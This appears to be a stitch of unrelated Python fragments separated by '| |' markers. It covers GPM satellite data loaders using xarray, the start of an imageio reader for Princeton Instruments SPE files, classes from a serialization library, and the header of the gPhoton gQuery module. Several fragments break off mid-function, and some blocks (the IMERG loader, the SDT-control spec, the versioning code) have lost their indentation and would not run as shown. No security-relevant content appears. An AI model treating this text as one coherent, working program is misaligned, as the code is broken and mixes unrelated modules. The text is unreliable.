the GPM observations.
The GPM Core satellite:
https://pmm.nasa.gov/gpm/flight-project/core-observatory
"""
def rename_phony_dims(ds):
    """Rename phony dims by the given DimensionNames.

    Scans all variables in ds for the DimensionNames attribute and uses
    it to decode "phony_dim_<num>" dimensions.  Additionally, variables
    carrying a CodeMissingValue attribute are masked with NaN where the
    data minimum equals that missing-value code (a heuristic: the mask is
    only applied when the code actually occurs as the minimum).

    Parameters
    ----------
    ds : {xarray.Dataset, xarray.DataArray}
        input dataset; every data variable is assumed to carry a
        DimensionNames attribute (comma-separated dimension names).

    Returns
    -------
    {xarray.Dataset, xarray.DataArray}
        renamed dataset (the input is not modified)
    """
    ds = ds.copy()
    for key, var in ds.items():
        names = var.DimensionNames.split(",")
        ds[key] = var.rename(
            {phony_dim: name for phony_dim, name in zip(var.dims, names) if phony_dim.startswith("phony_dim")}
        )
        if hasattr(ds[key], "CodeMissingValue"):
            # CodeMissingValue is stored as a string like "-9999.9"; the
            # integer part is what actually appears in the data.
            cmv = ds[key].CodeMissingValue
            int_cmv = int(cmv.split(".")[0])
            if ds[key].min() == int_cmv:
                # typo fix: message previously read "instead if"
                print(f"Note: Variable `{key}' uses {int_cmv:d} instead of {cmv} as missing value.")
                ds[key] = ds[key].where(ds[key] != int_cmv)
    return ds
@np.vectorize
def time_converter_ymdhms(year, month, dayOfMonth, hour, minute, second, milliSecond):
    """Build np.datetime64 values from individual date/time components.

    Vectorized over all arguments.  Milliseconds are converted to the
    microseconds expected by datetime; going through datetime.datetime
    keeps the calendar arithmetic correct.
    """
    stamp = datetime.datetime(year, month, dayOfMonth, hour, minute, second, milliSecond * 1000)
    return np.datetime64(stamp)
def open_gmi(filename):
    """xarray.open_dataset wrapper for gmi hdf5

    Opens both GMI swath groups (S1 and S2), renames their phony
    dimensions, attaches a np.datetime64 time coordinate built from the
    ScanTime subgroups, labels the channel axes, and appends the
    pseudo-nadir 89 GHz channels (see transfer_Wband_conical_to_nadir).
    """
    swath1 = xarray.open_dataset(filename, group="S1").rename(
        phony_dim_18="S1_time", phony_dim_19="S1_across", phony_dim_21="S1_frequency"
    )
    swath2 = xarray.open_dataset(filename, group="S2").rename(
        phony_dim_40="S2_time", phony_dim_41="S2_across", phony_dim_43="S2_frequency"
    )
    scan1 = xarray.open_dataset(filename, group="S1/ScanTime", decode_times=False, mask_and_scale=False)
    scan2 = xarray.open_dataset(filename, group="S2/ScanTime", decode_times=False, mask_and_scale=False)
    # Both swaths are expected to share one and the same scan-time axis.
    assert np.all(scan1.MilliSecond.values == scan2.MilliSecond.values)
    assert np.all(scan1.DayOfMonth.values == scan2.DayOfMonth.values)
    assert np.all(scan1.Year.values == scan2.Year.values)
    datetime64 = time_converter_ymdhms(
        scan1.Year.values,
        scan1.Month.values,
        scan1.DayOfMonth.values,
        scan1.Hour.values,
        scan1.Minute.values,
        scan1.Second.values,
        scan1.MilliSecond.values,
    )
    merged = xarray.Dataset()
    for key in swath1.keys():
        merged["S1_" + key] = swath1[key]
        merged["S2_" + key] = swath2[key]
    merged["S1_time"] = datetime64
    merged["S2_time"] = datetime64
    merged["S1_frequency"] = [
        "10.65 V",
        "10.65 H",
        "18.70 V",
        "18.70 H",
        "23.80 V",
        "36.50 V",
        "36.50 H",
        "89.00 V",
        "89.00 H",
    ]  # GHz
    merged["S2_frequency"] = ["166.00 V", "166.00 H", "183.31+-3.0 V", "183.31+-7.0 V"]  # GHz
    return transfer_Wband_conical_to_nadir(merged)
def transfer_Wband_conical_to_nadir(ds):
    """Convert the GMI measurements at 89 GHz to pseudo nadir measurements at 90 GHz

    The GMI scans at an earth-incidence-angle of 52.8 degree, while HAMP measures about
    straight nadir.
    This results in different length of the beam path through the atmosphere.
    However, this effect can be compensated for by using an empirical function. The
    coefficients of such functions can be found by comparing forward simulations
    of the different setups. Such a function can then also compensate the small frequency
    difference between the HAMP W-band channel at 90 GHz and the GMI channels at 89 GHz
    with horizontal and vertical polarizations.

    One can use both or just one of the 89 GHz channels to convert it to a nadir-90-GHz
    signal. Of course such conversion has some error, but it is nevertheless better to
    compare the converted GMI measurements with HAMP than the raw measurements.

    Two conversion functions are used here. One uses H and V, the other only one
    channel. There seems to be a definition difference between PAMTRA and GMI as to
    what is H and what is V. Thus we will apply a "H" correction on "V" measurements
    in the second correction.

    The converted GMI observations are stored in the "89.00 HV" and "89.00 HH" entries.
    """
    def fit_HV_pol(x, a, b, c, d, e):
        # Quadratic regression using both polarizations (x[0], x[1]).
        return a + b * x[0] + c * x[0] ** 2 + d * x[1] + e * x[1] ** 2

    def fit_mono_pol(x, a, b, c):
        # Quadratic regression using a single channel.
        return a + b * x + c * x ** 2

    # Empirical coefficients for the two-channel (V+H) conversion to nadir 90 GHz.
    param90 = [0.20539126, 3.80749043, -0.00869966, -2.39947559, 0.00718512]
    tb = xarray.zeros_like(ds.S1_Tb.sel(S1_frequency=["89.00 H"]))
    tb.values = fit_HV_pol(
        np.concatenate(
            [
                [ds.S1_Tb.sel(S1_frequency="89.00 V")],  # polarization is defined differently than in PAMTRA
                [ds.S1_Tb.sel(S1_frequency="89.00 H")],
            ]
        ),
        *param90,
    )[:, :, np.newaxis]
    tb = tb.assign_coords(S1_frequency=["89.00 HV"])
    tb_concat = xarray.concat((ds["S1_Tb"], tb), "S1_frequency")
    ds = ds.drop("S1_Tb").drop("S1_frequency")  # drop variables in order to extend them
    ds["S1_Tb"] = tb_concat

    # Empirical coefficients for the single-channel conversion.
    param90_V = [5.40000658e02, -3.20591358e00, 8.01888816e-03]
    tb = xarray.zeros_like(ds.S1_Tb.sel(S1_frequency=["89.00 H"]))
    tb.values = fit_mono_pol(ds.S1_Tb.sel(S1_frequency=["89.00 H"]), *param90_V)
    tb = tb.assign_coords(
        S1_frequency=["89.00 HH"]
    )  # polarization is defined differently than in PAMTRA. Therefore we use H channel here with V function
    tb_concat = xarray.concat((ds["S1_Tb"], tb), "S1_frequency")
    ds = ds.drop("S1_Tb").drop("S1_frequency")  # drop variables in order to extend them
    ds["S1_Tb"] = tb_concat
    return ds
def open_gprof(filename):
    """xarray.open_dataset wrapper for gmi gprof L2A hdf5

    GPROF is a precipitation product.
    """
    swath = rename_phony_dims(xarray.open_dataset(filename, group="S1"))
    swath = swath.rename(nscan="S1_time", npixel="S1_across")
    scan_time = xarray.open_dataset(
        filename, group="S1/ScanTime", decode_times=False, mask_and_scale=False
    )
    timestamps = time_converter_ymdhms(
        scan_time.Year.values,
        scan_time.Month.values,
        scan_time.DayOfMonth.values,
        scan_time.Hour.values,
        scan_time.Minute.values,
        scan_time.Second.values,
        scan_time.MilliSecond.values,
    )
    out = xarray.Dataset()
    for key in swath.keys():
        out["S1_" + key] = swath[key]
    out["S1_time"] = timestamps
    return out
def open_dpr_ka(filename):
    """xarray.open_dataset wrapper for dpr Ka-band precipitation radar KaPR hdf5

    The GPM radar data is stored in two different groups.
    These groups represent two different scan strategies.
    Originally these were the "main"-scan (MS) and the "high sensitivity" scan
    (HS) which was interlarded between the MS beams. However on May 21, 2018,
    JAXA and NASA changed the scanning pattern of the KaPR such that the HS bins
    are used to sample the outer swath of the KuPR:
    See KaPR_scan_pattern.pdf or https://www.eorc.jaxa.jp/en/news/2020/nw200604.html

    However, this means, we have to handle a MS and a HS dataset with its
    individual set of coordinates and stuff.
    """
    def open_scan(S):
        """opener function to open HS or MS datasets"""
        # Root group of the scan (geolocation etc.), with decoded dimensions.
        ds = xarray.open_dataset(filename, group=S)
        ds = rename_phony_dims(ds)
        # ScanTime is read raw (no time decoding) and converted manually below.
        ds_ScanTime = xarray.open_dataset(filename, group=S + "/ScanTime", decode_times=False, mask_and_scale=False)
        datetime64 = time_converter_ymdhms(
            ds_ScanTime.Year.values,
            ds_ScanTime.Month.values,
            ds_ScanTime.DayOfMonth.values,
            ds_ScanTime.Hour.values,
            ds_ScanTime.Minute.values,
            ds_ScanTime.Second.values,
            ds_ScanTime.MilliSecond.values,
        )
        # Merge the SLV and PRE subgroups into the root dataset.
        ds_SLV = xarray.open_dataset(filename, group=S + "/SLV")
        ds_SLV = rename_phony_dims(ds_SLV)
        ds_PRE = xarray.open_dataset(filename, group=S + "/PRE")
        ds_PRE = rename_phony_dims(ds_PRE)
        ds = ds.merge(ds_SLV)
        ds = ds.merge(ds_PRE)
        ds = ds.rename(nscan="time")
        ds["time"] = datetime64
        return ds

    # Open both scan strategies and prefix their variables so that the two
    # coordinate sets can coexist in one dataset.
    ds_HS = open_scan("HS").rename(time="HS_time", nrayHS="HS_across")
    ds_MS = open_scan("MS").rename(time="MS_time", nrayMS="MS_across")
    # Both scans are expected to carry the same set of variables.
    assert list(ds_HS.keys()) == list(ds_MS.keys())
    ds = xarray.Dataset()
    for key in ds_HS.keys():
        ds["HS_" + key] = ds_HS[key]
        ds["MS_" + key] = ds_MS[key]
    ds = ds.rename(nbin="MS_nbin", nbinHS="HS_nbin")
    return ds
def open_imerg(filename):
"""Open and serve the IMERG product hdf5 files with xarray"""
ds = xarray.open_dataset(
filename,
group="Grid",
decode_cf=False,
# use_cftime=False
)
assert ds.time.attrs["calendar"] == "julian"
del ds.time.attrs[
"calendar"
] # remove this information as it confuses xarray resulting in an object(cftime.DatetimeJulian) time vector instead of np.datetime64
ds = xarray.decode_cf(ds)
assert ds.dims["time"] == 1
ds = ds.isel(time=0)
Longitude, Latitude = np.meshgrid(ds.lon, ds.lat)
ds["Latitude"] = ("lat", "lon"), Latitude
ds["Latitude"] = ds["Latitude"].transpose(*ds.precipitationCal.dims)
ds["Longitude"] = ("lat", "lon"), Longitude
ds["Longitude"] = ds["Longitude"].transpose(*ds.precipitationCal.dims)
ds["HQobservationTime"] = ds.time + ds["HQobservationTime"]
ds = ds.rename(**{key: "S1_" + key for key in ds.variables.keys()})
| |
# -*- coding: utf-8 -*-
# imageio is distributed under the terms of the (new) BSD License.
""" Read SPE files.
Backend: internal
This plugin supports reading files saved in the Princeton Instruments
SPE file format.
Parameters for reading
----------------------
char_encoding : str
Character encoding used to decode strings in the metadata. Defaults
to "latin1".
check_filesize : bool
The number of frames in the file is stored in the file header. However,
this number may be wrong for certain software. If this is `True`
(default), derive the number of frames also from the file size and
raise a warning if the two values do not match.
sdt_meta : bool
If set to `True` (default), check for special metadata written by the
`SDT-control` software. Does not have an effect for files written by
other software.
Metadata for reading
--------------------
ROIs : list of dict
Regions of interest used for recording images. Each dict has the
"top_left" key containing x and y coordinates of the top left corner,
the "bottom_right" key with x and y coordinates of the bottom right
corner, and the "bin" key with number of binned pixels in x and y
directions.
comments : list of str
The SPE format allows for 5 comment strings of 80 characters each.
controller_version : int
Hardware version
logic_output : int
Definition of output BNC
amp_hi_cap_low_noise : int
Amp switching mode
mode : int
Timing mode
exp_sec : float
Alternative exposure in seconds
date : str
Date string
detector_temp : float
Detector temperature
detector_type : int
CCD / diode array type
st_diode : int
Trigger diode
delay_time : float
Used with async mode
shutter_control : int
Normal, disabled open, or disabled closed
absorb_live : bool
on / off
absorb_mode : int
Reference strip or file
can_do_virtual_chip : bool
True or False whether chip can do virtual chip
threshold_min_live : bool
on / off
threshold_min_val : float
Threshold minimum value
threshold_max_live : bool
on / off
threshold_max_val : float
Threshold maximum value
time_local : str
Experiment local time
time_utc : str
Experiment UTC time
adc_offset : int
ADC offset
adc_rate : int
ADC rate
adc_type : int
ADC type
adc_resolution : int
ADC resolution
adc_bit_adjust : int
ADC bit adjust
gain : int
gain
sw_version : str
Version of software which created this file
spare_4 : bytes
Reserved space
readout_time : float
Experiment readout time
type : str
Controller type
clockspeed_us : float
Vertical clock speed in microseconds
readout_mode : ["full frame", "frame transfer", "kinetics", ""]
Readout mode. Empty string means that this was not set by the
Software.
window_size : int
Window size for Kinetics mode
file_header_ver : float
File header version
chip_size : [int, int]
x and y dimensions of the camera chip
virt_chip_size : [int, int]
Virtual chip x and y dimensions
pre_pixels : [int, int]
Pre pixels in x and y dimensions
post_pixels : [int, int],
Post pixels in x and y dimensions
geometric : list of {"rotate", "reverse", "flip"}
Geometric operations
sdt_major_version : int
(only for files created by SDT-control)
Major version of SDT-control software
sdt_minor_version : int
(only for files created by SDT-control)
Minor version of SDT-control software
sdt_controller_name : str
(only for files created by SDT-control)
Controller name
exposure_time : float
(only for files created by SDT-control)
Exposure time in seconds
color_code : str
(only for files created by SDT-control)
Color channels used
detection_channels : int
(only for files created by SDT-control)
Number of channels
background_subtraction : bool
(only for files created by SDT-control)
    Whether background subtraction was turned on
em_active : bool
(only for files created by SDT-control)
Whether EM was turned on
em_gain : int
(only for files created by SDT-control)
EM gain
modulation_active : bool
(only for files created by SDT-control)
Whether laser modulation (“attenuate”) was turned on
pixel_size : float
(only for files created by SDT-control)
Camera pixel size
sequence_type : str
(only for files created by SDT-control)
    Type of sequence (standard, TOCCSL, arbitrary, …)
grid : float
(only for files created by SDT-control)
Sequence time unit (“grid size”) in seconds
n_macro : int
(only for files created by SDT-control)
Number of macro loops
delay_macro : float
(only for files created by SDT-control)
Time between macro loops in seconds
n_mini : int
(only for files created by SDT-control)
Number of mini loops
delay_mini : float
(only for files created by SDT-control)
Time between mini loops in seconds
n_micro : int (only for files created by SDT-control)
Number of micro loops
delay_micro : float (only for files created by SDT-control)
Time between micro loops in seconds
n_subpics : int
(only for files created by SDT-control)
Number of sub-pictures
delay_shutter : float
(only for files created by SDT-control)
Camera shutter delay in seconds
delay_prebleach : float
(only for files created by SDT-control)
Pre-bleach delay in seconds
bleach_time : float
(only for files created by SDT-control)
Bleaching time in seconds
recovery_time : float
(only for files created by SDT-control)
Recovery time in seconds
comment : str
(only for files created by SDT-control)
User-entered comment. This replaces the "comments" field.
datetime : datetime.datetime
(only for files created by SDT-control)
Combines the "date" and "time_local" keys. The latter two plus
"time_utc" are removed.
modulation_script : str
(only for files created by SDT-control)
Laser modulation script. Replaces the "spare_4" key.
"""
from datetime import datetime
import logging
import os
from typing import Any, Callable, Dict, Mapping, Optional, Sequence, Union
import numpy as np
from ..core import Format
logger = logging.getLogger(__name__)
class Spec:
    """SPE file specification data

    Tuples of (offset, datatype, count), where offset is the offset in the SPE
    file and datatype is the datatype as used in `numpy.fromfile`()
    `data_start` is the offset of actual image data.
    `dtypes` translates SPE datatypes (0...4) to numpy ones, e. g. dtypes[0]
    is dtype("<f") (which is np.float32).
    `controllers` maps the `type` metadata to a human readable name
    `readout_modes` maps the `readoutMode` metadata to something human readable
    although this may not be accurate since there is next to no documentation
    to be found.
    """

    # Header fields that are required to locate and decode the image data.
    basic = {
        "datatype": (108, "<h"),  # dtypes
        "xdim": (42, "<H"),
        "ydim": (656, "<H"),
        "xml_footer_offset": (678, "<Q"),
        "NumFrames": (1446, "<i"),
        "file_header_ver": (1992, "<f"),
    }

    # Optional header fields, read only when metadata is requested.
    metadata = {
        # ROI information
        "NumROI": (1510, "<h"),
        "ROIs": (
            1512,
            np.dtype(
                [
                    ("startx", "<H"),
                    ("endx", "<H"),
                    ("groupx", "<H"),
                    ("starty", "<H"),
                    ("endy", "<H"),
                    ("groupy", "<H"),
                ]
            ),
            10,
        ),
        # chip-related sizes
        "xDimDet": (6, "<H"),
        "yDimDet": (18, "<H"),
        "VChipXdim": (14, "<h"),
        "VChipYdim": (16, "<h"),
        # other stuff
        "controller_version": (0, "<h"),
        "logic_output": (2, "<h"),
        "amp_high_cap_low_noise": (4, "<H"),  # enum?
        "mode": (8, "<h"),  # enum?
        "exposure_sec": (10, "<f"),
        "date": (20, "<10S"),
        "detector_temp": (36, "<f"),
        "detector_type": (40, "<h"),
        "st_diode": (44, "<h"),
        "delay_time": (46, "<f"),
        # shutter_control: normal, disabled open, disabled closed
        # But which one is which?
        "shutter_control": (50, "<H"),
        "absorb_live": (52, "<h"),
        "absorb_mode": (54, "<H"),
        "can_do_virtual_chip": (56, "<h"),
        "threshold_min_live": (58, "<h"),
        "threshold_min_val": (60, "<f"),
        "threshold_max_live": (64, "<h"),
        "threshold_max_val": (66, "<f"),
        "time_local": (172, "<7S"),
        "time_utc": (179, "<7S"),
        "adc_offset": (188, "<H"),
        "adc_rate": (190, "<H"),
        "adc_type": (192, "<H"),
        "adc_resolution": (194, "<H"),
        "adc_bit_adjust": (196, "<H"),
        "gain": (198, "<H"),
        "comments": (200, "<80S", 5),
        "geometric": (600, "<H"),  # flags
        "sw_version": (688, "<16S"),
        "spare_4": (742, "<436S"),
        "XPrePixels": (98, "<h"),
        "XPostPixels": (100, "<h"),
        "YPrePixels": (102, "<h"),
        "YPostPixels": (104, "<h"),
        "readout_time": (672, "<f"),
        "xml_footer_offset": (678, "<Q"),
        "type": (704, "<h"),  # controllers
        "clockspeed_us": (1428, "<f"),
        "readout_mode": (1480, "<H"),  # readout_modes
        "window_size": (1482, "<H"),
        "file_header_ver": (1992, "<f"),
    }

    # Byte offset where the actual image data begins (fixed-size header).
    data_start = 4100

    # SPE "datatype" header value -> numpy dtype of the pixel data.
    dtypes = {
        0: np.dtype(np.float32),
        1: np.dtype(np.int32),
        2: np.dtype(np.int16),
        3: np.dtype(np.uint16),
        8: np.dtype(np.uint32),
    }

    # Index corresponds to the `type` header field.
    controllers = [
        "new120 (Type II)",
        "old120 (Type I)",
        "ST130",
        "ST121",
        "ST138",
        "DC131 (PentaMax)",
        "ST133 (MicroMax/Roper)",
        "ST135 (GPIB)",
        "VTCCD",
        "ST116 (GPIB)",
        "OMA3 (GPIB)",
        "OMA4",
    ]

    # This was gathered from random places on the internet and own experiments
    # with the camera. May not be accurate.
    readout_modes = ["full frame", "frame transfer", "kinetics"]

    # Do not decode the following metadata keys into strings, but leave them
    # as byte arrays
    no_decode = ["spare_4"]
class SDTControlSpec:
"""Extract metadata written by the SDT-control software
Some of it is encoded in the comment strings
(see :py:meth:`parse_comments`). Also, date and time are encoded in a
peculiar way (see :py:meth:`get_datetime`). Use :py:meth:`extract_metadata`
to update the metadata dict.
"""
months = {
# Convert SDT-control month strings to month numbers
"Jän": 1,
"Jan": 1,
"Feb": 2,
"Mär": 3,
"Mar": 3,
"Apr": 4,
"Mai": 5,
"May": 5,
"Jun": 6,
"Jul": | |
not changed:
p = deepcopy(p)
p.item_types = item_types
changed = True
elif isinstance(p, serial.properties.Dictionary) and (p.value_types is not None):
value_types = version_properties(p.value_types)
if value_types is not None:
if not changed:
p = deepcopy(p)
p.value_types = value_types
changed = True
if p.types is not None:
types = version_properties(p.types)
if types is not None:
if not changed:
p = deepcopy(p)
p.types = types
return p
if isinstance(data, Model):
im = serial.meta.read(data)
cm = serial.meta.read(type(data))
if isinstance(data, Object):
for n in tuple(im.properties.keys()):
p = im.properties[n]
if version_match(p):
np = version_property(p)
if np is not p:
if im is cm:
im = serial.meta.writable(data)
im.properties[n] = np
else:
if im is cm:
im = serial.meta.writable(data)
del im.properties[n]
v = getattr(data, n)
if v is not None:
raise serial.errors.VersionError(
'%s - the property `%s` is not applicable in %s version %s:\n%s' % (
qualified_name(type(data)),
n,
specification,
version_number,
str(data)
)
)
version(getattr(data, n), specification, version_number)
elif isinstance(data, Dictionary):
if im.value_types:
new_value_types = version_properties(im.value_types)
if new_value_types:
if im is cm:
im = serial.meta.writable(data)
im.value_types = new_value_types
for v in data.values():
version(v, specification, version_number)
elif isinstance(data, Array):
if im.item_types:
new_item_types = version_properties(im.item_types)
if new_item_types:
if im is cm:
im = serial.meta.writable(data)
im.item_types = new_item_types
for v in data:
version(v, specification, version_number)
elif isinstance(data, (collections.Set, collections.Sequence)) and not isinstance(data, (str, bytes)):
# for d in data:
# version(d, specification, version_number)
raise ValueError()
elif isinstance(data, (dict, OrderedDict)):
# for k, v in data.items():
# version(v, specification, version_number)
raise ValueError()
class Model(object):
    """Abstract base for serializable models.

    Each instance tracks its serialization format, metadata, hooks, and
    source-location bookkeeping (URL, XPath, JSON pointer), all of which
    start out as ``None``.
    """

    _format = None  # type: Optional[str]
    _meta = None  # type: Optional[serial.meta.Object]
    _hooks = None  # type: Optional[serial.hooks.Object]

    def __init__(self):
        # Every instance starts with a clean slate of bookkeeping slots.
        for attribute in ('_format', '_meta', '_hooks', '_url', '_xpath', '_pointer'):
            setattr(self, attribute, None)

    def __hash__(self):
        # Identity-based hashing: models are mutable, so hashing by value
        # would be unsafe in sets and dict keys.
        return id(self)
class Object(Model):
    """Model with a fixed set of named, typed properties.

    Property definitions are obtained from class/instance metadata
    (``serial.meta``). Instances may be initialized from another
    ``Object``, a ``dict``, a file-like object, or any object exposing
    attributes with names matching the declared properties.
    """

    _format = None  # type: Optional[str]
    _meta = None  # type: Optional[serial.meta.Object]
    _hooks = None  # type: Optional[serial.hooks.Object]

    def __init__(
        self,
        _=None,  # type: Optional[Union[str, bytes, dict, typing.Sequence, IO]]
    ):
        """Initialize, optionally copying data from `_`.

        :param _: Another `Object`, a `dict`, a file-like object, or any
            object with attributes matching this class' properties.
        """
        self._meta = None  # type: Optional[serial.meta.Object]
        self._hooks = None  # type: Optional[serial.hooks.Object]
        self._url = None  # type: Optional[str]
        self._xpath = None  # type: Optional[str]
        self._pointer = None  # type: Optional[str]
        if _ is not None:
            if isinstance(_, Object):
                # Copy (customized) metadata/hooks and all property values
                # from the other instance.
                m = serial.meta.read(_)
                if serial.meta.read(self) is not m:
                    serial.meta.write(self, deepcopy(m))
                h = serial.hooks.read(_)
                if serial.hooks.read(self) is not h:
                    serial.hooks.write(self, deepcopy(h))
                for k in m.properties.keys():
                    try:
                        setattr(self, k, getattr(_, k))
                    except TypeError as e:
                        # Prefix the property path so the error can be traced
                        # back to the offending property.
                        label = '\n - %s.%s: ' % (qualified_name(type(self)), k)
                        if e.args:
                            e.args = tuple(
                                chain(
                                    (label + e.args[0],),
                                    e.args[1:]
                                )
                            )
                        else:
                            e.args = (label + serialize(_),)
                        raise e
            else:
                if isinstance(_, IOBase):
                    # Remember where the data came from, for error reporting.
                    if hasattr(_, 'url'):
                        serial.meta.url(self, _.url)
                    elif hasattr(_, 'name'):
                        serial.meta.url(self, urljoin('file:', _.name))
                _, f = detect_format(_)
                if isinstance(_, dict):
                    for k, v in _.items():
                        if v is None:
                            v = serial.properties.NULL
                        try:
                            self[k] = v
                        except KeyError as e:
                            if e.args and len(e.args) == 1:
                                e.args = (
                                    r'%s.%s: %s' % (qualified_name(type(self)), e.args[0], json.dumps(_)),
                                )
                            raise e
                else:
                    # Generic object: copy every public attribute that maps to
                    # a declared property.
                    _dir = tuple(p for p in dir(_) if p[0] != '_')
                    for p in serial.meta.writable(self.__class__).properties.keys():
                        if p in _dir:
                            # Bug fix: `setattr` requires the attribute name.
                            # Previously `setattr(self, getattr(_, p))` raised
                            # TypeError for every non-dict source object.
                            setattr(self, p, getattr(_, p))
                if f is not None:
                    serial.meta.format_(self, f)

    def __setattr__(self, property_name, value):
        # type: (Object, str, Any) -> None
        """Unmarshal `value` per its property definition before storing it.

        Names beginning with "_" bypass property handling entirely.
        """
        if property_name[0] != '_':
            try:
                property_definition = serial.meta.read(self).properties[property_name]
                try:
                    value = property_definition.unmarshal(value)
                    if isinstance(value, Generator):
                        # Generators are single-use; store a reusable tuple.
                        value = tuple(value)
                except (TypeError, ValueError) as e:
                    # Prefix the property path so the error can be traced.
                    message = '\n - %s.%s: ' % (
                        qualified_name(type(self)),
                        property_name
                    )
                    if e.args and isinstance(e.args[0], str):
                        e.args = tuple(
                            chain(
                                (message + e.args[0],),
                                e.args[1:]
                            )
                        )
                    else:
                        e.args = (message + repr(value),)
                    raise e
            except KeyError as e:
                # Setting an undeclared property is only tolerated when the
                # value is None (i.e. clearing it).
                if value is not None:
                    raise e
        super().__setattr__(property_name, value)

    def __setitem__(self, key, value):
        # type: (str, Any) -> None
        """Set a property by its serialized name (falling back to the
        attribute name when they coincide)."""
        m = serial.meta.read(self)
        if key in m.properties:
            property_name = key
        else:
            # The serialized name may differ from the attribute name.
            property_name = None
            for pn, pd in m.properties.items():
                if key == pd.name:
                    property_name = pn
                    break
            if property_name is None:
                raise KeyError(
                    '`%s` has no property mapped to the name "%s"' % (
                        qualified_name(type(self)),
                        key
                    )
                )
        setattr(self, property_name, value)

    def __getitem__(self, key):
        # type: (str) -> Any
        """Get a property value by its serialized (or attribute) name."""
        m = serial.meta.read(self)
        if key in m.properties:
            property_name = key
        else:
            property_definition = None
            property_name = None
            for pn, pd in m.properties.items():
                if key == pd.name:
                    property_name = pn
                    property_definition = pd
                    break
            if property_definition is None:
                raise KeyError(
                    '`%s` has no property mapped to the name "%s"' % (
                        qualified_name(type(self)),
                        key
                    )
                )
        return getattr(self, property_name)

    def __copy__(self):
        # type: () -> Object
        """Shallow copy via the copy-constructor."""
        return self.__class__(self)

    def __deepcopy__(self, memo=None):
        # type: (Optional[dict]) -> Object
        """Deep copy: duplicates customized metadata/hooks and all property
        values (callables are shared, not copied)."""
        new_instance = self.__class__()
        im = serial.meta.read(self)
        cm = serial.meta.read(type(self))
        if im is cm:
            m = cm  # type: serial.meta.Object
        else:
            # Instance-level metadata was customized -- copy it over.
            serial.meta.write(new_instance, deepcopy(im, memo=memo))
            m = im  # type: serial.meta.Object
        ih = serial.hooks.read(self)
        ch = serial.hooks.read(type(self))
        if ih is not ch:
            serial.hooks.write(new_instance, deepcopy(ih, memo=memo))
        if m is not None:
            for k in m.properties.keys():
                try:
                    v = getattr(self, k)
                    if v is not None:
                        if not isinstance(v, Callable):
                            v = deepcopy(v, memo=memo)
                        setattr(new_instance, k, v)
                except TypeError as e:
                    # Prefix the property path so the error can be traced.
                    label = '%s.%s: ' % (qualified_name(type(self)), k)
                    if e.args:
                        e.args = tuple(
                            chain(
                                (label + e.args[0],),
                                e.args[1:]
                            )
                        )
                    else:
                        e.args = (label + serialize(self),)
                    raise e
        return new_instance

    def _marshal(self):
        """Marshal all non-None properties into an ``OrderedDict`` keyed by
        their serialized names, applying before/after-marshal hooks."""
        o = self
        h = serial.hooks.read(o)
        if (h is not None) and (h.before_marshal is not None):
            o = h.before_marshal(o)
        data = OrderedDict()
        m = serial.meta.read(o)
        for pn, p in m.properties.items():
            v = getattr(o, pn)
            if v is not None:
                k = p.name or pn
                data[k] = p.marshal(v)
        if (h is not None) and (h.after_marshal is not None):
            data = h.after_marshal(data)
        return data

    def __str__(self):
        return serialize(self)

    def __repr__(self):
        """Multi-line constructor-style representation of all set
        properties."""
        representation = [
            '%s(' % qualified_name(type(self))
        ]
        m = serial.meta.read(self)
        for p in m.properties.keys():
            v = getattr(self, p)
            if v is not None:
                rv = (
                    qualified_name(v)
                    if isinstance(v, type) else
                    repr(v)
                )
                # Indent continuation lines of nested representations.
                rvls = rv.split('\n')
                if len(rvls) > 2:
                    rvs = [rvls[0]]
                    for rvl in rvls[1:]:
                        rvs.append('    ' + rvl)
                    rv = '\n'.join(rvs)
                representation.append(
                    '    %s=%s,' % (p, rv)
                )
        representation.append(')')
        if len(representation) > 2:
            return '\n'.join(representation)
        else:
            return ''.join(representation)

    def __eq__(self, other):
        # type: (Any) -> bool
        """Equal iff `other` is the same type and every property value
        matches."""
        if type(self) is not type(other):
            return False
        m = serial.meta.read(self)
        om = serial.meta.read(other)
        self_properties = set(m.properties.keys())
        other_properties = set(om.properties.keys())
        for p in self_properties | other_properties:
            v = getattr(self, p)
            ov = getattr(other, p)
            if v != ov:
                return False
        return True

    def __ne__(self, other):
        # type: (Any) -> bool
        return False if self == other else True

    def __iter__(self):
        # Iterates the *serialized* names of all declared properties.
        m = serial.meta.read(self)
        for k, p in m.properties.items():
            yield p.name or k

    def _validate(self, raise_errors=True):
        # type: (bool) -> list
        """Collect validation errors for all properties.

        :param raise_errors: If `True` (default), raise a `ValidationError`
            summarizing all problems; otherwise return them as a list.
        :returns: list of str -- the collected error messages.
        """
        errors = []
        o = self
        h = serial.hooks.read(self)
        if (h is not None) and (h.before_validate is not None):
            o = h.before_validate(o)
        m = serial.meta.read(o)
        for pn, p in m.properties.items():
            v = getattr(o, pn)
            if v is None:
                # `required` may be a predicate of the instance.
                if isinstance(p.required, Callable):
                    required = p.required(o)
                else:
                    required = p.required
                if required:
                    errors.append('The property `%s` is required for `%s`:\n%s' % (pn, qualified_name(type(o)), str(o)))
            else:
                if v is serial.properties.NULL:
                    types = p.types
                    if isinstance(types, collections.Callable):
                        types = types(v)
                    if types is not None:
                        # On py2, `str` implies `native_str` is also allowed.
                        if (str in types) and (native_str is not str) and (native_str not in types):
                            types = tuple(chain(*(
                                ((t, native_str) if (t is str) else (t,))
                                for t in types
                            )))
                        if serial.properties.Null not in types:
                            errors.append(
                                'Null values are not allowed in `%s.%s`, ' % (qualified_name(type(o)), pn) +
                                'permitted types include: %s.' % ', '.join(
                                    '`%s`' % qualified_name(t) for t in types
                                )
                            )
                else:
                    try:
                        errors.extend(validate(v, p.types, raise_errors=False))
                    except serial.errors.ValidationError as e:
                        # NOTE(review): this exception is annotated but not
                        # re-raised or collected -- with raise_errors=False it
                        # is not expected to occur; preserved as-is.
                        message = '%s.%s:\n' % (qualified_name(type(o)), pn)
                        if e.args:
                            e.args = tuple(chain(
                                (e.args[0] + message,),
                                e.args[1:]
                            ))
                        else:
                            e.args = (
                                message,
                            )
        if (h is not None) and (h.after_validate is not None):
            o = h.after_validate(o)
        if raise_errors and errors:
            raise serial.errors.ValidationError('\n'.join(errors))
        return errors
class Array(list, Model):
_format = None | |
"""
.. module:: gQuery
:synopsis: Defines and constructs common queries that are passed to the
GALEX databases (esp: photon, aspect, and MCAT) at MAST.
"""
from __future__ import absolute_import, division, print_function
# Core and Third Party imports.
from builtins import str
# gPhoton imports.
import gPhoton.CalUtils as CalUtils
from gPhoton.MCUtils import manage_requests2
from gPhoton.galextools import isPostCSP
from gPhoton import time_id
# ------------------------------------------------------------------------------
# To save space, times in the database are "integer-ized" by multiplying by 1000
tscale = 1000.
# The following three global variables are used in constructing a properly
